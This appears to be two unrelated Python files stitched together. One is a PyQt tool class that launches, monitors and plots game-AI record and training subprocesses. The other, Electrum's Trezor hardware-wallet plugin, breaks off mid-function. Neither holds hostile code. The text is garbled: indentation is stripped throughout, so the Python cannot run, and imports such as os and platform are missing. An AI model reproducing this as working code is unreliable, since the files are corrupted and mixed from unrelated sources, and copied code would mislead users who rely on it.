from ....common.define import TRAIN_NAME, CONFIG_RECORD, START_RECORD, STOP_RECORD, START_TRAIN, STOP_TRAIN, \
BOOL_FLAGS, ACTION_SAMPLE_PATH, RECORD_ANDROID_GUIDANCE_IMG, RECORD_WINDOWS_GUIDANCE_IMG, SDK_PATH, BIN_PATH
from ...canvas.canvas_signal import canvas_signal_inst
from ...dialog.label_dialog import LabelDialog
from ...dialog.tip_dialog import show_warning_tips
from ...utils import set_log_text, get_sub_nodes, create_tree_item, ExecResult, get_tree_top_nodes, save_action, \
valid_number_value, filter_info_log, is_image
from .train_data import TrainData
from ....context.app_context import AppContext
from ....project.project_manager import g_project_manager
from ....subprocess_service.subprocess_service_manager import backend_service_manager as bsa
from ....common.utils import backend_service_monitor
from ....WrappedDeviceAPI.wrappedDeviceConfig import DeviceType
IS_WINDOWS_SYSTEM = platform.platform().lower().startswith('win')
if IS_WINDOWS_SYSTEM:
from ....WrappedDeviceAPI.deviceAPI.pcDevice.windows.win32driver import probe, by
logger = logging.getLogger("sdktool")
class TrainNode(QObject):
ACTION_SAMPLE_SERVICE_NAME = 'train_node_action_sample'
AISDK_TRAIN_SERVICE_NAME = 'train_node_train'
clear_right_tree_signal = pyqtSignal(ExecResult)
log_signal = pyqtSignal(str)
run_signal = pyqtSignal(str, str, bool)
def __init__(self):
super().__init__()
# self.__record_process = None
self.__train_process = None
self.__node = None
self.__data = TrainData()
self.__left_tree = ui.tree_widget_left
self.__right_tree = ui.tree_widget_right
self.__over = False
self._http_server_port = 52808
self._is_training = False
def create_node(self, run_node):
if run_node is None:
logger.error("run node is none, create train node failed")
return
result = ExecResult()
self.clear_right_tree_signal.emit(result)
self.__right_tree.clear()
sub_nodes = get_sub_nodes(run_node)
for sub_node in sub_nodes:
if sub_node.text(0) == TRAIN_NAME:
self.__node = sub_node
break
if self.__node is None:
self.__node = create_tree_item(key=TRAIN_NAME, edit=False)
run_node.addChild(self.__node)
run_node.setExpanded(True)
else:
for _ in range(self.__node.childCount()):
self.__node.takeChild(0)
sub_names = [CONFIG_RECORD, START_RECORD, STOP_RECORD, START_TRAIN, STOP_TRAIN]
for sub_name in sub_names:
self.__node.addChild(create_tree_item(key=sub_name, node_type=sub_name, edit=False))
self.__node.setExpanded(True)
def config_record(self):
        # save the right-hand tree
result = ExecResult()
self.clear_right_tree_signal.emit(result)
self.__right_tree.clear()
param = self.__data.load_record_data()
for key, value in param.items():
self.create_complex_node(key=key, value=value)
def _combobox_text_changed(self, text):
current_item = self.__right_tree.currentItem()
current_item.setText(1, text)
def create_complex_node(self, key, value, root=None, edit_flag=True):
# 0: key, 1:value, 2:type
if root is None:
sub_node = QTreeWidgetItem(self.__right_tree)
sub_node.setText(0, key)
else:
sub_node = create_tree_item(key=key, edit=edit_flag)
root.addChild(sub_node)
root.setExpanded(True)
logger.debug("value %s type %s", value, type(value))
if isinstance(value, bool):
combobox = QComboBox()
combobox.addItems(BOOL_FLAGS)
# combobox.setCurrentIndex(-1)
combobox.setCurrentText(str(value))
combobox.currentTextChanged.connect(self._combobox_text_changed)
sub_node.setText(1, str(value))
self.__right_tree.setItemWidget(sub_node, 1, combobox)
elif isinstance(value, (int, float, str)):
logger.debug("key %s value %s type str", key, value)
sub_node.setText(1, str(value))
sub_node.setFlags(sub_node.flags() | Qt.ItemIsEditable)
elif isinstance(value, (dict, OrderedDict)):
logger.debug("value %s type dict", value)
for sub_key, sub_value in value.items():
self.create_complex_node(key=sub_key, value=sub_value, root=sub_node, edit_flag=edit_flag)
sub_node.setExpanded(True)
@staticmethod
def _stop_canvas_phone():
data_source = DataSource()
data_source.finish()
def show_train_info(self):
result = ExecResult()
self.clear_right_tree_signal.emit(result)
self.__right_tree.clear()
network_param = self.__data.get_network_parameter()
if network_param is None:
logger.error("train info is none")
return
        # display only, not editable
for key, value in network_param.items():
item = QTreeWidgetItem(self.__right_tree)
item.setText(0, key)
item.setText(1, str(value))
def show_record_info(self):
param = self.__data.load_record_data()
if param is None:
return
        # display only, not editable
for key, value in param.items():
item = QTreeWidgetItem(self.__right_tree)
item.setText(0, key)
item.setText(1, str(value))
def is_training(self):
return bsa.exist_service(service_name=self.AISDK_TRAIN_SERVICE_NAME)
def is_recording(self):
return bsa.exist_process(self.ACTION_SAMPLE_SERVICE_NAME)
def _notify_record_process_stop(self):
""" 通知录制进程退出
:return:
"""
def notify_record_process_stop():
cmd = 'http://127.0.0.1:%s?method=quit' % self._http_server_port
logger.info('http get request: %s', cmd)
urllib.request.urlopen(cmd)
pthread = threading.Thread(target=notify_record_process_stop, name='notify_record_process_stop', daemon=True)
pthread.start()
pthread.join(5)
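    # Example of the request issued above (with the default port set in __init__):
    # GET http://127.0.0.1:52808?method=quit, sent from a daemon thread with a 5 s join
    # so a hung recorder process cannot block the UI.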
@staticmethod
def _get_hwnd_by_qpath(query_path):
hwnds = probe.Win32Probe().search_element(by.QPath(query_path))
cnt = len(hwnds)
if cnt == 1:
return hwnds[0]
if cnt > 1:
show_warning_tips('found multi windows by qpath(%s)' % query_path)
else:
show_warning_tips('failed to find window by qpath(%s)' % query_path)
return None
def start_record(self):
        # check whether the recording program has already been started
if bsa.exist_process(self.ACTION_SAMPLE_SERVICE_NAME):
msg = "record is already start..."
logger.info(msg)
set_log_text(msg)
return
result = ExecResult()
self.clear_right_tree_signal.emit(result)
self.__right_tree.clear()
try:
            # convert to the configuration files required for recording
self.__data.save_record_data()
self.__data.save_sample_action()
current_path = os.getcwd()
os.chdir(ACTION_SAMPLE_PATH)
time.sleep(0.5)
data_source = DataSource()
data_source.finish()
app_ctx = AppContext()
app_ctx.set_info("phone", False)
serial = app_ctx.get_info("phone_serial", None)
device_type = g_project_manager.get_device_type()
if serial is None and device_type == DeviceType.Windows.value:
qpath = g_project_manager.get_window_qpath()
serial = self._get_hwnd_by_qpath(qpath)
if serial:
run_program = "python main.py -s %s -p %s -m %s" % (serial, self._http_server_port, device_type)
else:
run_program = "python main.py -p %s -m %s" % (self._http_server_port, device_type)
is_ok, desc = bsa.start_service(service_name=self.ACTION_SAMPLE_SERVICE_NAME,
run_programs=run_program,
process_param_type=bsa.SUBPROCESS_SHELL_TYPE,
callback_func=backend_service_monitor,
start_internal=10)
if not is_ok:
msg = "start service %s failed, %s" % (self.ACTION_SAMPLE_SERVICE_NAME, desc)
raise RuntimeError(msg)
else:
logger.info("start service %s success", self.ACTION_SAMPLE_SERVICE_NAME)
os.chdir(current_path)
self.run_signal.emit('record', STOP_RECORD, True)
if device_type == DeviceType.Android.value:
image_name = RECORD_ANDROID_GUIDANCE_IMG
elif device_type == DeviceType.Windows.value:
image_name = RECORD_WINDOWS_GUIDANCE_IMG
else:
raise ValueError('unknown device type:%s' % device_type)
canvas_signal_inst.canvas_show_img(image_name)
self.show_record_info()
set_log_text("****start record*****")
except RuntimeError as err:
cb_msg = traceback.format_exc()
msg = "start record failed: {}\n traceback {}".format(str(err), cb_msg)
logger.error(msg)
set_log_text(msg)
def _stop_record(self):
        # try to notify the recording process to quit via an HTTP request
if bsa.exist_service(self.ACTION_SAMPLE_SERVICE_NAME):
self._notify_record_process_stop()
is_ok, _ = bsa.stop_service(service_name=self.ACTION_SAMPLE_SERVICE_NAME)
if not is_ok:
logger.error("stop service %s failed", self.ACTION_SAMPLE_SERVICE_NAME)
return
logger.info("stop service %s success", self.ACTION_SAMPLE_SERVICE_NAME)
self.run_signal.emit('record', '', False)
set_log_text('stop record success')
def stop_record(self):
dlg = LabelDialog(text="please confirm to stop record sample", title="confirm")
dlg.finish_signal.connect(self._stop_record)
dlg.pop_up()
def save_record_config(self):
""" 保存录制的配置
:return:
"""
tree_param = OrderedDict()
top_level_nodes = get_tree_top_nodes(self.__right_tree)
for top_level_node in top_level_nodes:
node_key = top_level_node.text(0)
if top_level_node.childCount() == 0:
node_value = top_level_node.text(1)
tree_param[node_key] = node_value
else:
tree_param[node_key] = save_action(top_level_node)
valid_number_value(tree_param)
        # add the save path
self.__data.save_record_data(tree_param)
@staticmethod
def _parser_acc_log(str_line):
        # take the following string as an example, without lstm: 'Iteration 0....20: train_acc is 0.5877976190476191 and val_acc is 0.6546875'
iter_info_no_lstm = re.findall(r"Iteration (.+?): train_acc is", str_line)
# NetworkLSTM: Iter 5....20: train_acc is 0.6646706576118926 and val_acc is 0.6973478939157566
iter_info_lstm = re.findall(r"Iter (.+?): train_acc is", str_line)
iter_info = iter_info_lstm if len(iter_info_lstm) > len(iter_info_no_lstm) else iter_info_no_lstm
if len(iter_info) < 1:
return -1, -1
# ['0....20']--->'0....20'
sub_iter_info = iter_info[0]
# '0....20'--->['0', '20']
iter_data = sub_iter_info.split('....')
# '0'--->0
iter_data = int(iter_data[0])
train_acc_info = re.findall(r"train_acc is (.+?) and val_acc is", str_line)
if len(train_acc_info) < 1:
return -1, -1
# ['0.5877976190476191'(str)]--->0.5877976190476191
acc_data = float(train_acc_info[0])
return iter_data, acc_data
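    # Worked example (based on the regexes above): the line
    # 'Iteration 0....20: train_acc is 0.5877976190476191 and val_acc is 0.6546875'
    # yields iter_data=0 and acc_data=0.5877976190476191; lines without a matching
    # pattern return (-1, -1).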
@staticmethod
def _parser_progress(line):
# 17/18 [===========================>..] - ETA: 1s - loss: 8.9437 - acc: 0.9062
        # log example: 48/48 [==============================] - 6s 115ms/step - loss: 0.5667 - out_task0
# target_line = re.findall(r"out_task0_loss:(.+?)out_task1_loss: ", line)
target_line = re.findall(r"loss:", line)
if len(target_line) == 0:
return -1, -1
try:
cur_num_index = line.index('/')
cur_num = line[0:cur_num_index]
cur_num = int(cur_num)
            # take the substring from cur_num to the end of the line
batch_num = line[cur_num_index+1:]
batch_num = batch_num.split()[0]
batch_num = int(batch_num)
return cur_num, batch_num
except RuntimeError as err:
logger.error("error: %s", str(err))
return -1, -1
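    # Worked example (based on the parsing above): the Keras progress line
    # '17/18 [===========================>..] - ETA: 1s - loss: 8.9437 - acc: 0.9062'
    # yields cur_num=17 and batch_num=18; lines without 'loss:' return (-1, -1).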
def _parser_log(self):
if self.__train_process is None:
return -1, -1, -1, -1, None
self.__train_process.stdout.flush()
line = self.__train_process.stdout.readline()
if line is None:
return -1, -1, -1, -1, None
try:
str_line = line.decode('utf-8')
except ValueError as err:
logger.error('error line:%s', str(err))
logger.error('error line:%s', line)
return -1, -1, -1, -1, None
iter_data, acc_data = self._parser_acc_log(str_line)
cur_num, batch_num = self._parser_progress(str_line)
return iter_data, acc_data, cur_num, batch_num, str_line
def _paint_train_log(self):
network_param = self.__data.get_network_parameter()
if network_param is None:
logger.error("network param is none")
return
begin = time.time()
        # get the maximum number of training iterations
max_epoch = network_param['trainIter']
max_epoch = int(max_epoch)
def _paint_windows_percent(cur_iter, cur_num, batch_num, percent_data, time_data):
            # draw the progress plot
if cur_num >= 0:
                # e.g. with epoch = 20 and batch_num = 48 there are 20 x 48 data points in total
max_data = max_epoch * batch_num
                # unit: seconds
current = cur_iter * batch_num + cur_num
percent = int(current * 100.0 / max_data)
if percent in percent_data:
return
percent_data.append(percent)
cur_time = time.time()
cost = int((cur_time - begin) * 1000)
time_data.append(cost)
plot.plot(time_data, percent_data, '', c='g')
def _paint_Linux_percent(cur_iter, cur_num, batch_num, percent_data, time_data, pre_time):
if -1 not in [batch_num, cur_num]:
                # e.g. with epoch = 20 and batch_num = 48 there are 20 x 48 data points in total
max_data = max_epoch * batch_num
cur_time = time.time()
interval = cur_time - pre_time
batch_cost = interval / batch_num
for i in range(1, batch_num + 1):
                    # unit: seconds
current = cur_iter * batch_num + i
percent = int(current * 100.0 / max_data)
if percent in percent_data:
continue
percent_data.append(percent)
cur_time = time.time()
cost = int((cur_time - begin) * 1000)
time_data.append(cost)
plot.plot(time_data, percent_data, '', c='g')
time.sleep(batch_cost)
                    # save the plot image
plot_image_path = './test2.jpg'
plot.savefig(plot_image_path)
canvas_signal_inst.canvas_show_img(plot_image_path)
def _paint_log():
font1 = {'family': 'Times New Roman', 'weight': 'normal', 'size': 15}
iter_datas = []
acc_datas = []
cur_iter = 0
pre_time = begin
percent_data = []
time_data = []
logger.info("************start paint log************")
self.__over = False
log_text = ''
while not self.__over:
try:
iter_data, acc_data, cur_num, batch_num, str_line = self._parser_log()
                    # record the log content
if str_line is not None:
str_line = filter_info_log(str_line)
log_text += str_line
self.log_signal.emit(log_text)
if -1 not in [iter_data, acc_data]:
                        # the iteration count in the log output starts from 0
iter_data = iter_data + 1
iter_datas.append(iter_data)
acc_datas.append(acc_data)
cur_iter = iter_data
                        # clear the plot
plot.close('all')
_, (ax1, ax2) = plot.subplots(2, 1)
# ax2 = plot.subplot(2, 1, 2)
plot.sca(ax2)
                        # draw the x and y axis labels
plot.xlabel('epoch', font1)
plot.ylabel('acc', font1)
                        # range of the x axis
plot.xticks(numpy.arange(1, max_epoch+1, step=1))
if len(iter_datas) > 0:
plot.plot(iter_datas, acc_datas, '', c='g')
                        # draw the title
if cur_iter < max_epoch:
plot.title('train(epoch current/max: {}/{})'.format(cur_iter, max_epoch), font1)
else:
plot.title('train over, max epoch: {}'.format(max_epoch), font1)
self.__over = True
# ax1 = plot.subplot(2, 1, 1)
plot.sca(ax1)
                        # draw the x axis label
plot.title('process')
plot.xlabel('cost time(ms)', font1)
                        # draw the y axis label
plot.ylabel('percent(%)', font1)
plot.plot(time_data, percent_data, '', c='g')
plot.tight_layout()
                        # draw the progress plot
if IS_WINDOWS_SYSTEM:
_paint_windows_percent(cur_iter, cur_num, batch_num, percent_data, time_data)
else:
_paint_Linux_percent(cur_iter, cur_num, batch_num, percent_data, time_data, pre_time)
pre_time = time.time()
                        # save the plot image
plot_image_path = 'test2.jpg'
plot.savefig(plot_image_path)
if not is_image(plot_image_path):
continue
                        # load the image file
canvas_signal_inst.canvas_show_img(plot_image_path)
if self.__over:
ai_sdk_path = os.environ.get('AI_SDK_PATH')
if ai_sdk_path is None:
ai_sdk_path = SDK_PATH
log_text += "train over....\n save mode to path: '{}/data/ImitationModel/'.".format(ai_sdk_path)
self.log_signal.emit(log_text)
plot.close(1)
except RuntimeError as e:
exp = traceback.format_exc()
logger.error("************ %s %s ****", str(e), exp)
paint_log_thread = threading.Thread(target=_paint_log, args=())
paint_log_thread.start()
def start_train(self):
        # check whether the training program has already been started
if bsa.exist_service(service_name=self.AISDK_TRAIN_SERVICE_NAME):
logger.info("train is already start...")
set_log_text("train is already start...")
return
result = ExecResult()
self.clear_right_tree_signal.emit(result)
self.__right_tree.clear()
try:
            # stop any existing connection
data_source = DataSource()
data_source.finish()
app_ctx = AppContext()
app_ctx.set_info("phone", False)
            # change to the bin directory
current_path = os.getcwd()
os.chdir(BIN_PATH)
time.sleep(1)
project_config_path = g_project_manager.get_project_property_file()
run_program = 'python agentai.py --mode=train --cfgpath=%s' % project_config_path
is_ok, desc = bsa.start_service(service_name=self.AISDK_TRAIN_SERVICE_NAME,
run_programs=run_program,
process_param_type=bsa.SUBPROCESS_STDOUT_TYPE,
callback_func=backend_service_monitor)
if not is_ok:
raise Exception('start service {} failed, {}'.format(self.AISDK_TRAIN_SERVICE_NAME, desc))
self.__train_process = bsa.get_processes(self.AISDK_TRAIN_SERVICE_NAME)
os.chdir(current_path)
self.run_signal.emit('train', STOP_TRAIN, True)
            # show the training info
self.show_train_info()
set_log_text("start train")
self._is_training = True
            # plot the training info
self._paint_train_log()
except RuntimeError as err:
msg = traceback.format_exc()
msg = "start train failed: {}, traceback {}".format(err, msg)
logger.error(msg)
set_log_text(msg)
def _stop_train(self):
self.run_signal.emit('train', '', False)
if not bsa.exist_service(service_name=self.AISDK_TRAIN_SERVICE_NAME):
return
if not self._is_training:
return
logger.info("stop train process")
bsa.stop_service(service_name=self.AISDK_TRAIN_SERVICE_NAME)
self.__train_process = None
self._is_training = False
def stop_train(self):
self.__over = True
        # wait 1s for the worker thread to finish processing
set_log_text('stop train..')
self._stop_train()
time.sleep(1)
app_ctx = AppContext()
app_ctx.set_info("phone", True)
def finish(self):
self._stop_record()
self._stop_train()
|
trezor.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, versiontuple, UserCancelled
from electrum.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum import constants
from electrum.i18n import _
from electrum.plugins import BasePlugin, Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey, xtype_from_derivation
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
# script "generation"
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_script_gen(self):
xtype = xtype_from_derivation(self.derivation)
if xtype in ('p2wpkh', 'p2wsh'):
return SCRIPT_GEN_NATIVE_SEGWIT
elif xtype in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return SCRIPT_GEN_P2SH_SEGWIT
else:
return SCRIPT_GEN_LEGACY
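    # Mapping implemented above: derivations of xtype 'p2wpkh'/'p2wsh' use
    # SCRIPT_GEN_NATIVE_SEGWIT, 'p2wpkh-p2sh'/'p2wsh-p2sh' use SCRIPT_GEN_P2SH_SEGWIT,
    # and everything else falls back to SCRIPT_GEN_LEGACY.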
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
# Minimal test if python-trezor is installed
import trezorlib
try:
library_version = trezorlib.__version__
except AttributeError:
# python-trezor only introduced __version__ in 0.9.0
library_version = 'unknown'
if library_version == 'unknown' or \
versiontuple(library_version) < self.minimum_library:
self.libraries_available_message = (
_("Library version for '{}' is too old.").format(name)
+ '\nInstalled: {}, Needed: {}'
.format(library_version, self.minimum_library))
self.print_stderr(self.libraries_available_message)
raise ImportError()
self.libraries_available = True
except ImportError:
self.libraries_available = False
return
from . import client
from . import transport
import trezorlib.messages
self.client_class = client.TrezorClient
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language,
type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, script_gen, is_multisig):
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
return self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
return self.types.InputScriptType.SPENDP2SHWITNESS
else:
if is_multisig:
return self.types.InputScriptType.SPENDMULTISIG
else:
return self.types.InputScriptType.SPENDADDRESS
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
